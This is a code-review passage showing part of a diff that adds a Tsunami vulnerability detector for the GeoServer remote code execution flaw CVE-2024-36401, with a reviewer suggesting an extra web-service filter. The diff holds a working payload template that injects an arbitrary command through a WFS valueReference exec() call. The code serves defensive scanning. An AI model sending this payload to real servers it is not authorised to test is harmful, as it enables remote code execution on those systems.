community/detectors/geoserver_cve_2024_36401/src/main/java/com/google/tsunami/plugins/detectors/rce/GeoserverCve202436401VulnDetector.java

```diff
@@ -0,0 +1,196 @@
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.ForWebService;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugin.payload.NotImplementedException;
+import com.google.tsunami.plugins.detectors.rce.Annotations.OobSleepDuration;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.net.URLEncoder;
+import java.nio.charset.StandardCharsets;
+import java.time.Clock;
+import java.time.Duration;
+import java.time.Instant;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects the geoserver Cve-2024-36401 RCE vulnerability. */
+@ForWebService
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "GeoserverCve202436401VulnDetector",
+    version = "0.1",
+    description = "This detector checks for Geoserver RCE (CVE-2024-36401)",
+    author = "grandsilva",
+    bootstrapModule = GeoserverCve202436401VulnDetectorBootstrapModule.class)
+public class GeoserverCve202436401VulnDetector implements VulnDetector {
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  @VisibleForTesting
+  static final String RCE_PAYLOAD =
+      "%sgeoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames"
+          + "=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'%s')";
+
+  private final PayloadGenerator payloadGenerator;
+  private final HttpClient httpClient;
+  private final Clock utcClock;
+  private final int oobSleepDuration;
+
+  @Inject
+  GeoserverCve202436401VulnDetector(
+      HttpClient httpClient,
+      @UtcClock Clock utcClock,
+      PayloadGenerator payloadGenerator,
+      @OobSleepDuration int oobSleepDuration) {
+    this.httpClient = checkNotNull(httpClient);
+    this.utcClock = checkNotNull(utcClock);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+    this.oobSleepDuration = oobSleepDuration;
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("GeoserverCve202436401VulnDetector starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(this::isGeoserverInstance)
```

Comment:
```suggestion
            matchedServices.stream()
                .filter(NetworkServiceUtils::isWebService)
                .filter(this::isGeoserverInstance)
```

Just to be safe, let's filter for web services as the first step.